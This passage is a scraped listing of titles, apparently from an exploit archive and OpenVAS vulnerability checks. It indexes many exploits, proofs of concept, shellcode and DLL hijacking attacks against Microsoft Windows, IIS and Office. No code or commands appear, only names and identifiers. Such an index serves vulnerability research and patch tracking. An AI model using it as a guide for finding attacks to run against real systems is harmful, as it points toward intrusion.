Processor Remote Code Execution [15148] MOAUB #29 - Microsoft Excel SxView Record Parsing Heap Memory Corruption [15136] Windows Mobile 6.5 TR Phone Call Shellcode [15122] MOAUB #27 - Microsoft Internet Explorer MSHTML Findtext Processing Issue [15116] Windows Mobile 6.5 TR (WinCE 5.2) MessageBox Shellcode (ARM) [15112] MOAUB #26 - Microsoft Cinepak Codec CVDecompress Heap Overflow [15096] MOAUB #24 - Microsoft MPEG Layer-3 Audio Decoder Division By Zero [15094] MOAUB #24 - Microsoft Excel OBJ Record Stack Overflow [15088] MOAUB #23 - Microsoft Excel HFPicture Record Parsing Memory Corruption (0day) [15065] MOAUB #21 - Microsoft Excel WOPT Record Parsing Heap Memory Corruption [15061] microsoft drm technology (msnetobj.dll) activex Multiple Vulnerabilities [15034] Microsoft Mspaint bmp crash Proof Of Concept [15019] MOAUB #16 - Microsoft Excel HFPicture Record Parsing Remote Code Execution Vulnerability [14971] MOAUB #11 - Microsoft Office Word 2007 sprmCMajority Buffer Overflow [14944] MOAUB #8 - Microsoft Office Visio DXF File Stack based Overflow [14895] MOAUB #5 - Microsoft MPEG Layer-3 Remote Command Execution Exploit [14782] Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll) [14780] Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll) [14758] Microsoft Group Convertor DLL Hijacking Exploit (imm.dll) [14754] Microsoft Internet Connection Signup Wizard DLL Hijacking Exploit (smmscrpt.dll) [14751] Microsoft Vista BitLocker Drive Encryption API Hijacking Exploit (fveapi.dll) [14746] Microsoft Office Groove 2007 DLL Hijacking Exploit (mso.dll) [14745] Microsoft Address Book 6.00.2900.5512 DLL Hijacking Exploit (wab32res.dll) [14744] Microsoft Visio 2003 DLL Hijacking Exploit (mfc71enu.dll) [14728] Windows Live Email DLL Hijacking Exploit (dwmapi.dll) [14723] Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll) [14697] Windows XP SP3 English MessageBoxA Shellcode - 87 bytes [14613] Windows Live Messenger <= 14.0.8117 Animation Remote Denial of Service [14607] Microsoft SMB Server Trans2 Zero Size Pool Alloc (MS10-054) [14413] IE 7.0 - DoS Microsoft Clip Organizer Multiple Insecure ActiveX Control [14361] Microsoft Excel 0x5D record Stack Overflow Vulnerability [14295] Microsoft MSHTML.DLL CTIMEOUTEVENTLIST::INSERTINTOTIMEOUTLIST Memory Leak (0day) [14179] Microsoft Internet Information Services (IIS) 5 Authentication Bypass Vulnerability (MS10-065) [14156] Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vulnerability [13729] Windows Seven x64 (cmd) Shellcode 61 Bytes [13719] Windows Seven Pro SP1 64 Fr (Beep) Shellcode 39 Bytes [13639] Windows XP Professional SP2 ita calc.exe shellcode 36 bytes [13631] Windows XP Home Edition SP3 English (calc.exe) 37 bytes [13630] Windows Xp Home Edition SP2 English (calc.exe) 37 bytes [13582] "Windows XP Pro Sp2 English ""Wordpad"" Shellcode" [13581] "Windows XP Pro Sp2 English ""Message-Box"" Shellcode" [13532] MS Windows (DCOM RPC2) Universal Shellcode [13531] windows/XP-sp1 portshell on port 58821 116 bytes [13530] windows/XP download and exec source [13527] Windows 9x/NT/2k/XP PEB method 35 bytes [13526] Windows 9x/NT/2k/XP PEB method 31 bytes [13525] Windows 9x/NT/2k/XP PEB method 29 bytes [13524] Windows 9x/NT/2k/XP Reverse Generic Shellcode without Loader 249 bytes [13523] Windows NT/2k/XP useradd shellcode for russian systems 318 bytes [13504] Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs [13283] windows xp/sp1 generate portbind payload [12728] Microsoft Outlook Web Access (OWA) 8.2.254.0 - Information Disclosure vulnerability [12524] Windows SMB2 Negotiate Protocol (0x72) Response DoS [12518] Microsoft Paint Integer Overflow Vulnerability (DoS) MS10-005 [12450] Microsoft SharePoint Server 2007 XSS Vulnerability [12337] Windows 2000/XP/2003 win32k.sys SfnINSTRING local kernel Denial of Service Vulnerability [12336] Windows 2000/XP/2003 win32k.sys SfnLOGONNOTIFY local kernel Denial of Service Vulnerability [12273] Windows 7/2008R2 SMB Client Trans2 Stack Overflow 10-020 PoC [12119] WINDOWS FTP SERVER by DWG (Auth Bypass) [12079] Microsoft Office (2010 beta) Communicator SIP Denial of Service Exploit [12032] Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution [11683] Microsoft Internet Explorer iepeers.dll Use-After-Free Exploit (meta) [11531] Windows Media Player 11.0.5721.5145 (.mpg) Buffer Overflow Exploit [11276] Microsoft Internet Explorer 6.0/7.0 NULL pointer crashes [11214] Windows Live Messenger 2009 ActiveX Heap Overflow PoC [11199] Windows NT User Mode to Ring 0 Escalation Vulnerability [11070] Windows Live Messenger 2009 ActiveX DoS Vulnerability [11034] Microsoft HTML Help Compiler (hhc.exe) BOF PoC [10791] Microsoft IIS ASP Multiple Extensions Security Bypass 5.x/6.x [10747] Mini-Stream Exploit for Windows XP SP2 and SP3 [10375] SAP GUI for Windows sapirrfc.dll Activex Overflow Exploit [10005] Windows 7 / Server 2008R2 Remote Kernel Crash [9893] Microsoft Internet Explorer 5,6,7 - Memory Corruption PoC [9596] SIDVault 2.0e Windows Universal Buffer Overflow Exploit (SEH) [9594] Windows Vista/7 SMB2.0 Negotiate Protocol Request Remote BSOD Vuln [9592] SIDVault 2.0e Windows Remote Buffer Overflow Exploit (meta) [9587] Microsoft IIS 5.0/6.0 FTP Server (Stack Exhaustion) Denial of Service [9586] SIDVault 2.0e Windows Remote Buffer Overflow Exploit [9559] Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4) [9541] Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k) [9516] Novell Client for Windows 2000/XP ActiveX Remote DoS Vulnerability [9417] MS Windows 2003 (EOT File) BSOD Crash Exploit [9163] Microsoft Office Web Components (Spreadsheet) ActiveX BOF PoC [9117] HTC / Windows Mobile OBEX FTP Service Directory Traversal Vuln [9100] Microsoft Internet Explorer (AddFavorite) Remote Crash PoC [9093] windows live messenger plus! fileserver 1.0 - Directory Traversal vuln [8832] ICQ 6.5 URL Search Hook (Windows Explorer) Remote BOF PoC [8806] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (pl) [8765] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php) [8754] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch) [8704] Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Vulnerability [8467] Microsoft Media Player - (quartz.dll .wav) Multiple Remote DoS Vulns [8466] Microsoft GDI Plugin .png Infinite Loop Denial of Service PoC [8465] Microsoft Media Player - (quartz.dll .mid) Denial of Service Exploit [8445] MS Windows Media Player (.mid File) Integer Overflow PoC [8281] Microsoft GdiPlus EMF GpFont.SetData Integer Overflow PoC [7910] WOW - Web On Windows ActiveX Control 2 Remote Code Execution [7727] Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit [7720] MS Windows (.CHM File) Denial of Service (html compiled) [7585] MS Windows Media Player - (.WAV) Remote Crash PoC [7501] Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit [7262] Microsoft Office Communicator (SIP) Remote Denial of Service Exploit [7217] Quicksilver Forums <= 1.4.2 RCE Exploit (windows only) [7196] Microsoft XML Core Services DTD Cross-Domain Scripting PoC MS08-069 [7132] MS Windows Server Service Code Execution Exploit (MS08-067) (2k/2k3) [7104] MS Windows Server Service Code Execution Exploit (MS08-067) [6841] MS Windows Server Service Code Execution Exploit (MS08-067) (Univ) [6824] MS Windows Server Service Code Execution PoC (MS08-067) [6757] MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin) [6732] MS Windows InternalOpenColorProfile Heap Overflow PoC (MS08-046) [6716] MS Windows GDI+ Proof of Concept (MS08-052) #2 [6705] MS Windows 2003 Token Kidnapping Local Exploit PoC [6699] Microsoft PicturePusher ActiveX Cross Site File Upload Attack PoC [6671] MS Windows Vista Access Violation from Limited Account Exploit (BSoD) [6656] MS Windows GDI (EMR_COLORMATCHTOTARGETW) Exploit MS08-021 [6616] MS Windows Explorer Unspecified .ZIP File Denial of Service Exploit [6588] MS Windows GDI+ (.ico File) Remote Division By Zero Exploit [6582] Windows Mobile 6.0 Device long name Remote Reboot Exploit [6565] K-Lite Mega Codec Pack 3.5.7.0 - Local Windows Explorer DoS PoC [6560] MS Windows Wordpad .doc File Local Denial of Service PoC [6463] MS Windows WRITE_ANDX SMB command handling Kernel DoS (meta) [6454] Windows Media Encoder wmex.dll ActiveX BOF Exploit (MS08-053) [6330] Micrsoft Windows GDI (CreateDIBPatternBrushPt) Heap Overflow PoC [6317] Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit [6244] Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF PoC [6181] RealVNC Windows Client 4.1.2 - Remote DoS Crash PoC [6124] Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit [5951] XnView 1.93.6 for Windows .taac Local Buffer Overflow Exploit PoC [5563] TFTP Server for Windows 1.4 ST Remote BSS Overflow Exploit [5530] Microsoft Works 7 WkImgSrv.dll ActiveX Remote BOF Exploit [5518] MS Windows XP SP2 (win32k.sys) Privilege Escalation Exploit (MS08-025) [5460] Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC [5442] MS Windows GDI Image Parsing Stack Overflow Exploit (MS08-021) [5349] Microsoft Visual InterDev 6.0 (SP6) SLN File Local Buffer Overflow PoC [5327] MS Windows Explorer Unspecified .DOC File Denial of Service Exploit [5320] Microsoft Office XP SP3 PPT File Buffer Overflow Exploit (ms08-016) [5314] TFTP Server for Windows 1.4 ST Buffer Overflow Exploit (0day) [5287] Microsoft Office Excel Code Execution Exploit (MS08-014) [5107] Microsoft Office .WPS File Stack Overflow Exploit (MS08-011) [5087] Microsoft DirectSpeechSynthesis Module Remote Buffer Overflow Exploit [4948] Windows RSH daemon <= 1.8 - Remote Buffer Overflow Exploit [4934] MS Windows Message Queuing Service RPC BOF Exploit (dnsname) [4892] Microsoft Visual InterDev 6.0 (SP6) .sln File Local Buffer Overflow Exploit [4874] Microsoft Rich Textbox Control 6.0 (SP6) SaveFile() Insecure Method [4873] Microsoft FoxServer (vfp6r.dll 6.0.8862.0) ActiveX Command Execution [4866] Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit [4760] MS Windows 2000 AS SP4 Message Queue Exploit (MS07-065) [4745] MS Windows Message Queuing Service RPC BOF Exploit (MS07-065) [4702] Windows Media Player 6.4 MP4 File Stack Overflow PoC [4682] Windows Media Player AIFF Divide By Zero Exception DoS PoC [4625] Microsoft Jet Engine MDB File Parsing Stack Overflow PoC [4616] Microsoft Internet Explorer TIF/TIFF Code Execution (MS07-055) [4506] Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution [4431] Microsoft Visual Basic Enterprise Edition 6.0 SP6 Code Execution Exploit [4398] Microsoft SQL Server Distributed Management Objects BoF Exploit [4394] Microsoft Visual Studio 6.0 (VBTOVSI.DLL 1.0.0.0) File Overwrite Exploit [4393] Microsoft Visual Studio 6.0 (PDWizard.ocx) Remote Command Execution [4379] Microsoft SQL Server Distributed Management Objects (sqldmo.dll) BoF [4369] Microsoft Visual FoxPro 6.0 (FPOLE.OCX 6.0.8450.0) - Remote PoC [4361] Microsoft Visual Basic 6.0 VBP_Open OLE Local CodeExec Exploit [4337] MS Windows (GDI32.DLL) Denial of Service Exploit (MS07-046) [4325] XAMPP for Windows 1.6.3a Local Privilege Escalation Exploit [4279] Microsoft DXMedia SDK 6 (SourceUrl) ActiveX Remote Code Execution [4259] Microsoft Visual 6 (VDT70.DLL NotSafe) Stack Overflow Exploit [4222] Windows RSH daemon 1.7 - Remote Buffer Overflow Exploit [4215] MS Windows Explorer.exe Gif Image Denial of Service Exploit [4205] TeamSpeak 2.0 (Windows Release) Remote Denial of Service Exploit [4121] Microsoft Excel 2000/2003 Sheet Name Vulnerability PoC [4067] Microsoft Office MSODataSourceControl COM-object BoF PoC (0day) [4066] Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2) [4065] Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4) [4061] Safari 3 for Windows Beta Remote Command Execution PoC [4044] MS Windows GDI+ ICO File - Remote Denial of Service Exploit [4016] Microsoft IIS <= 5.1 Hit Highlighting Authentication Bypass Exploit [3977] Microsoft Visual Basic 6.0 Project (Description) Stack overflow PoC [3976] Microsoft Visual Basic 6.0 Project (Company Name) Stack overflow PoC [3973] Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit [3965] Microsoft IIS 6.0 (/AUX/.aspx) Remote Denial of Service Exploit [3926] MS Windows Vista - Forged ARP packet Network Stack DoS Exploit [3804] MS Windows (.ANI) GDI Remote Elevation of Privilege Exploit (MS07-017) [3755] MS Windows GDI Local Privilege Escalation Exploit (MS07-017) 2 [3740] MS Windows DNS DnssrvQuery Remote Stack Overflow Exploit [3738] XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit [3737] MS Windows DNS RPC Remote Buffer Overflow Exploit (win2k SP4) [3695] MS Windows Animated Cursor (.ANI) Local Overflow Exploit [3693] MS Windows .HLP File Local HEAP Overflow PoC 0day [3690] microsoft office word 2007 - Multiple Vulnerabilities [3688] MS Windows GDI Local Privilege Escalation Exploit (MS07-017) [3684] MS Windows Explorer Unspecified .ANI File Denial of Service Exploit [3652] MS Windows Animated Cursor (.ANI) Overflow Exploit (Hardware DEP) [3651] MS Windows Animated Cursor (.ANI) Universal Exploit Generator [3647] MS Windows Animated Cursor (.ANI) Local Buffer Overflow Exploit [3636] MS Windows Animated Cursor (.ANI) Remote Exploit (eeye patch bypass) [3635] MS Windows XP Animated Cursor (.ANI) Remote Overflow Exploit 2 [3634] MS Windows XP/Vista Animated Cursor (.ANI) Remote Overflow Exploit [3617] MS Windows Animated Cursor (.ANI) Stack Overflow Exploit [3575] Frontbase <= 4.2.7 - Remote Buffer Overflow Exploit (windows) [3544] Microsoft DNS Server (Dynamic DNS Updates) Remote Exploit [3453] MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption [3419] MS Windows (.doc File) Malformed Pointers Denial of Service Exploit [3260] Microsoft Word 2000 Unspecified Code Execution Exploit (0day) [3193] Microsoft Excel Malformed Palette Record DoS PoC (MS07-002) [3190] MS Windows Explorer (AVI) Unspecified Denial of Service Exploit [3176] Microsoft Visual C++ (.RC Resource Files) Local Buffer Overflow Exploit [3159] Microsoft Help Workshop 4.03.0002 (.HPJ) Buffer Overflow Exploit [3149] Microsoft Help Workshop 4.03.0002 (.CNT) Buffer Overflow Exploit [3111] MS Windows Explorer (WMF) CreateBrushIndirect DoS Exploit [3071] Microsoft Vista (NtRaiseHardError) Privilege Escalation Exploit [3052] MS Windows NtRaiseHardError Csrss.exe-winsrv.dll Double Free [3024] MS Windows NtRaiseHardError Csrss.exe Memory Disclosure Exploit [3022] MS Windows ASN.1 - Remote Exploit (MS04-007) [3013] MS Windows NetrWkstaUserEnum() Remote DoS Exploit (0day) [2967] MS Windows (MessageBox) Memory Corruption Local Denial of Service [2935] Windows Media Player 9/10 (MID File) Denial of Service Exploit [2922] Microsoft Word Document (malformed pointer) Proof of Concept [2900] MS Windows DNS Resolution Remote Denial of Service PoC (MS06-041) [2879] MS Windows spoolss GetPrinterData() Remote DoS Exploit (0day) [2809] MS Windows NetpManageIPCConnect Stack Overflow Exploit (py) [2800] MS Windows Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070) [2789] MS Windows NetpManageIPCConnect Stack Overflow Exploit (MS06-070) [2682] MS Windows NAT Helper Components Remote DoS Exploit (perl) [2672] MS Windows NAT Helper Components (ipnathlp.dll) Remote DoS Exploit [2523] Microsoft Office 2003 PPT Local Buffer Overflow PoC [2412] MS Windows (Windows Kernel) Privilege Escalation Exploit (MS06-049) [2355] MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2k3) [2265] MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) (2) [2231] Simple Machines Forum <= 1.1 rc2 (lngfile) Remote Exploit (windows) [2223] MS Windows CanonicalizePathName() Remote Exploit (MS06-040) [2210] MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) (2) [2204] MS Windows PNG File IHDR Block Denial of Service Exploit PoC (c) [2194] MS Windows PNG File IHDR Block Denial of Service Exploit PoC [2162] MS Windows NetpIsRemote() Remote Overflow Exploit (MS06-040) [2091] Microsoft PowerPoint 2003 SP2 Local Code Execution Exploit (french) [2057] MS Windows Mailslot Ring0 Memory Corruption Exploit (MS06-035) [2056] Microsoft IIS ASP Stack Overflow Exploit (MS06-034) [2054] MS Windows DHCP Client Broadcast Attack Exploit (MS06-036) [2001] Microsoft Word 2000/2003 Unchecked Boundary Condition Vulnerability [1999] Microsoft Word 2000/2003 Hlink Local Buffer Overflow Exploit PoC [1988] Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian) [1986] Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french) [1978] Microsoft Excel Universal Hlink Local Buffer Overflow Exploit [1967] MS Windows TCP/IP Protocol Driver Remote Buffer Overflow Exploit [1965] MS Windows RRAS RASMAN Registry Stack Overflow Exploit (MS06-025) [1958] Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit [1944] Microsoft Excel Unspecified Remote Code Execution Exploit [1940] MS Windows RRAS Remote Stack Overflow Exploit (MS06-025) [1927] Microsoft Excel Unicode Local Overflow Exploit PoC [1911] MS Windows XP/2K (Mrxsmb.sys) Privilege Escalation PoC (MS06-030) [1910] MS Windows (NtClose DeadLock) Vulnerability PoC (MS06-030) [1603] MS Windows XP/2003 - (IGMP v3) Denial of Service Exploit (MS06-007) (2) [1599] MS Windows XP/2003 (IGMP v3) - Denial of Service Exploit (MS06-007) [1584] MS Windows Telephony Service Command Execution Exploit (MS05-040) [1520] MS Windows Media Player Plugin Overflow Exploit (MS06-006)(3) [1506] MS Windows Color Management Module Overflow Exploit (MS05-036) (2) [1505] MS Windows Media Player 10 Plugin Overflow Exploit (MS06-006) [1504] MS Windows Media Player 9 Plugin Overflow Exploit (MS06-006) (meta) [1502] Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2) [1500] Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) [1495] Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (3) [1490] Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (new) [1488] Microsoft HTML Help Workshop (.hhp file) Denial of Service [1470] Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit [1465] MS Windows Services ACLs Local Privilege Escalation Exploit (updated) [1420] MS Windows Metafile (WMF) Remote File Download Exploit Generator [1407] MS Windows 2k Kernel APC Data-Free Local Escalation Exploit (MS05-055) [1396] MS Windows IIS Malformed HTTP Request Denial of Service Exploit (cpp) [1391] Windows XP/2003 Metafile Escape() Code Execution Exploit (meta) [1377] MS Windows IIS Malformed HTTP Request Denial of Service Exploit (pl) [1376] MS Windows IIS Malformed HTTP Request Denial of Service Exploit (c) [1346] MS Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053) [1343] MS Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053) [1341] MS Windows MSDTC Service Remote Memory Modification PoC (MS05-051) [1328] MS Windows 2k UPNP (getdevicelist) Memory Leak DoS Exploit [1287] GO-Global Windows Server <= 3.1.0.3270 Buffer Overflow (PoC) [1286] GO-Global Windows Clients <= 3.1.0.3270 Buffer Overflow (PoC) [1271] MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) (2) [1269] MS Windows Plug-and-Play (Umpnpmgr.dll) DoS Exploit (MS05-047) [1260] MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta) [1198] MS Windows CSRSS Local Privilege Escalation Exploit (MS05-018) [1197] MS Windows (keybd_event) Local Privilege Elevation Exploit [1180] MS Windows Plug-and-Play Service Remote Universal Exploit (french fix) [1179] MS Windows Plug-and-Play Service Remote Universal Exploit (spanish fix) [1178] MS Windows IIS 5.0 (500-100.asp) Server Name Spoof Exploit [1149] MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039) [1147] Veritas Backup Exec Remote File Access Exploit (windows) [1146] MS Windows Plug-and-Play Service Remote Overflow (MS05-039) [1143] MS Windows XP SP2 (rdpwd.sys) Remote Kernel DoS Exploit [1128] MS Windows (LegitCheckControl.dll) Genuine Advantage Validation Patch [1116] MS Windows Color Management Module Overflow Exploit (MS05-036) [1104] MS Windows Netman Service Local Denial of Service Exploit [1075] MS Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3) [1065] MS Windows (SMB) Transaction Response Handling Exploit (MS05-011) [1019] MS Windows COM Structured Storage Local Exploit (MS05-012) [1000] MS Windows XP/2003 - IPv6 Remote Denial of Service Exploit [976] MS Windows WINS Vulnerability and OS/SP Scanner [942] MS Windows Malformed IP Options DoS Exploit (MS05-019) [938] MS Windows (HTA) Script Execution Exploit (MS05-016) [909] MS Windows (WINS) Remote Buffer Overflow Exploit (v.3) [861] MS Windows XP/2003 Remote Denial of Service Exploit [749] MS Windows Improper Token Validation Local Exploit (working) [734] MS Windows NetDDE Remote Buffer Overflow Exploit (MS04-031) [733] MS Windows 2000 WINS Remote Code Execution Exploit [721] MS Windows Kernel ANI File Parsing Crash Vulnerability [640] MS Windows Compressed Zipped Folders Exploit (MS04-034) [585] MS Windows IIS WebDAV XML Denial of Service Exploit (MS04-030) [584] MS Windows Metafile (.emf) Heap Overflow Exploit (MS04-032) [578] MS Windows NNTP Service (XPAT) Denial of Service Exploit (MS04-036) [556] MS Windows JPEG GDI+ All-In-One Bind/Reverse/Admin/FileDownload [480] MS Windows JPEG GDI+ Remote Heap Overflow Exploit (MS04-028) [478] MS Windows JPEG GDI+ Overflow Download Shellcode Exploit (MS04-028) [475] MS Windows JPEG GDI+ Overflow Administrator Exploit (MS04-028) [474] MS Windows JPEG Processing Buffer Overrun Exploit (MS04-028) [472] MS Windows JPEG GDI+ Overflow Shellcoded Exploit [368] MS Windows XP Task Scheduler (.job) Universal Exploit (MS04-022) [366] MS Windows SMS 2.0 - Denial of Service Exploit [355] MS Windows 2k Utility Manager (All-In-One) Exploit (MS04-019) [353] MS Windows 2K/XP Task Scheduler .job Exploit (MS04-022) [352] MS Windows 2000 Universal Language Utility Manager Exploit (MS04-019) [351] MS Windows 2K POSIX Subsystem Privilege Escalation Exploit (MS04-020) [350] MS Windows 2000 Utility Manager Privilege Elevation Exploit (MS04-019) [329] MS Windows NT Crash with an Extra Long Username DoS Exploit [295] MS Windows XP/2K Lsasrv.dll Remote Universal Exploit (MS04-011) [293] MS Windows Lsasrv.dll RPC Remote Buffer Overflow Exploit (MS04-011) [276] MS Windows 2K/XP TCP Connection Reset Remote Attack Tool [275] MS Windows IIS 5.0 SSL Remote buffer overflow Exploit (MS04-011) [271] MS Windows Utility Manager Local SYSTEM Exploit (MS04-011) [268] MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit (2) [266] MS Windows 2000 sp1/sp2 isapi .printer Extension Overflow Exploit [214] MS Windows (Jolt2.c) Denial of Service Exploit [176] MS Windows IIS SSL Remote Denial of Service Exploit (MS04-011) [163] Eudora 6.0.3 Attachment Spoofing Exploit (windows) [153] MS Windows ASN.1 LSASS.EXE Remote Exploit (MS04-007) [148] MS Windows XP/2003 Samba Share Resource Exhaustion Exploit [135] MS Windows Messenger Service Remote Exploit FR (MS03-043) [130] MS Windows XP Workstation Service Remote Exploit (MS03-049) [123] MS Windows Workstation Service WKSSVC Remote Exploit (MS03-049) [122] MS Windows (ListBox/ComboBox Control) Local Exploit (MS03-045) [119] MS Windows 2000/XP Workstation Service Overflow (MS03-049) [117] MS Windows XP/2000 RPC Remote (non exec memory) Exploit [111] MS Windows Messenger Service Denial of Service Exploit (MS03-043) [109] MS Windows (RPC2) Universal Exploit & DoS (RPC3) (MS03-039) [103] MS Windows (RPC DCOM2) Remote Exploit (MS03-039) [100] MS Windows (RPC DCOM) Long Filename Overflow Exploit (MS03-026) [97] MS Windows (RPC DCOM) Scanner (MS03-039) [92] Microsoft WordPerfect Document Converter Exploit (MS03-036) [86] Real Server 7/8/9 Remote Root Exploit (Windows & Linux) [81] MS Windows 2000 RSVP Server Authority Hijacking PoC Exploit [76] MS Windows (RPC DCOM) Remote Exploit (Universal Targets) [70] MS Windows (RPC DCOM) Remote Exploit (48 Targets) [69] MS Windows RPC DCOM Remote Exploit (18 Targets) [66] MS Windows (RPC DCOM) Remote Exploit (w2k+XP Targets) [65] MS Windows SQL Server Denial of Service Remote Exploit (MS03-031) [64] MS Windows (RPC DCOM) Remote Buffer Overflow Exploit [61] MS Windows 2000 RPC DCOM Interface DoS Exploit [56] MS Windows Media Services (nsiislog.dll) Remote Exploit [51] MS Windows WebDav III remote root Exploit (xwdav) [48] MS Windows Media Services Remote Exploit (MS03-022) [36] MS Windows WebDav II (New) Remote Root Exploit [35] MS Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit [32] MS Windows XP (explorer.exe) Buffer Overflow Exploit [23] Real Server < 8.0.2 - Remote Exploit (Windows Platforms) [20] MS Windows SMB Authentication Remote Exploit [5] MS Windows RPC Locator Service Remote Exploit [2] MS Windows WebDAV Remote PoC Exploit [1] MS Windows WebDAV (ntdll.dll) Remote Exploit OpenVAS (Nessus) - http://www.openvas.org: [903041] Microsoft Windows Kernel Privilege Elevation Vulnerability (2724197) [903036] Microsoft Windows Networking Components Remote Code Execution Vulnerabilities (2733594) [903035] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerability (2731847) [903033] Microsoft Windows Kernel-Mode Drivers Privilege Elevation Vulnerabilities (2718523) [902936] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2783534) [902933] Microsoft Windows Shell Remote Code Execution Vulnerabilities (2727528) [902916] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (2711167) [902909] Microsoft Windows Service Pack Missing Multiple Vulnerabilities [902908] Microsoft Windows DirectWrite Denial of Service Vulnerability (2665364) [902906] Microsoft Windows DNS Server Denial of Service Vulnerability (2647170) [902900] Microsoft Windows SSL/TLS Information Disclosure Vulnerability (2643584) [902846] Microsoft Windows TLS Protocol Information Disclosure Vulnerability (2655992) [902845] Microsoft Windows Shell Remote Code Execution Vulnerability (2691442) [902829] Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258) [902807] Microsoft Windows Media Could Allow Remote Code Execution Vulnerabilities (2636391) [902784] Microsoft Windows Object Packager Remote Code Execution Vulnerability (2603381) [902783] Microsoft Windows Kernel Security Feature Bypass Vulnerability (2644615) [902782] MicroSoft Windows Server Service Remote Code Execution Vulnerability (921883) [902766] Microsoft Windows Kernel Privilege Elevation Vulnerability (2633171) [902694] Microsoft Windows IIS FTP Service Information Disclosure Vulnerability (2761226) [902693] Microsoft Windows Kernel-Mode Drivers Remote Code Execution Vulnerabilities (2761226) [902687] Microsoft Windows Data Access Components Remote Code Execution Vulnerability (2698365) [902677] Microsoft Windows Prtition Manager Privilege Elevation Vulnerability (2690533) [902676] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (2688338) [902609] Microsoft Windows CSRSS Privilege Escalation Vulnerabilities (2507938) [902598] Microsoft Windows Time Component Remote Code Execution Vulnerability (2618451) [902597] Microsoft Windows Media Remote Code Execution Vulnerability (2648048) [902596] Microsoft Windows OLE Remote Code Execution Vulnerability (2624667) [902588] Microsoft Windows Internet Protocol Validation Remote Code Execution Vulnerability [902566] Microsoft Windows WINS Local Privilege Escalation Vulnerability (2571621) [902516] Microsoft Windows WINS Remote Code Execution Vulnerability (2524426) [902487] Microsoft Windows Active Directory LDAPS Authentication Bypass Vulnerability (2630837) [902484] Microsoft Windows TCP/IP Remote Code Execution Vulnerability (2588516) [902463] Microsoft Windows Client/Server Run-time Subsystem Privilege Escalation Vulnerability (2567680) [902440] Microsoft Windows SMB Server Remote Code Execution Vulnerability (2536275) [902425] Microsoft Windows SMB Accessible Shares [902403] Microsoft Windows Fraudulent Digital Certificates Spoofing Vulnerability [902377] Microsoft Windows OLE Automation Remote Code Execution Vulnerability (2476490) [902337] Microsoft Windows Kernel Elevation of Privilege Vulnerability (2393802) [902290] Microsoft Windows Active Directory SPN Denial of Service (2478953) [902289] Microsoft Windows LSASS Privilege Escalation Vulnerability (2478960) [902281] Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910) [902280] Microsoft Windows BranchCache Remote Code Execution Vulnerability (2385678) [902277] Microsoft Windows Netlogon Service Denial of Service Vulnerability (2207559) [902276] Microsoft Windows Task Scheduler Elevation of Privilege Vulnerability (2305420) [902269] Microsoft Windows SMB Server NTLM Multiple Vulnerabilities (971468) [902263] Microsoft Windows Media Player Network Sharing Remote Code Execution Vulnerability (2281679) [902262] Microsoft Windows Shell and WordPad COM Validation Vulnerability (2405882) [902256] Microsoft Windows win32k.sys Driver 'CreateDIBPalette()' BOF Vulnerability [902232] Microsoft Windows TCP/IP Privilege Elevation Vulnerabilities (978886) [902231] Microsoft Windows Tracing Feature Privilege Elevation Vulnerabilities (982799) [902227] Microsoft Windows LSASS Denial of Service Vulnerability (975467) [902226] Microsoft Windows Shell Remote Code Execution Vulnerability (2286198) [902094] Microsoft Windows Kernel Mode Drivers Privilege Elevation Vulnerabilities (2160329) [902093] Microsoft Windows Kernel Privilege Elevation Vulnerabilities (981852) [902067] Microsoft Windows Kernel Mode Drivers Privilege Escalation 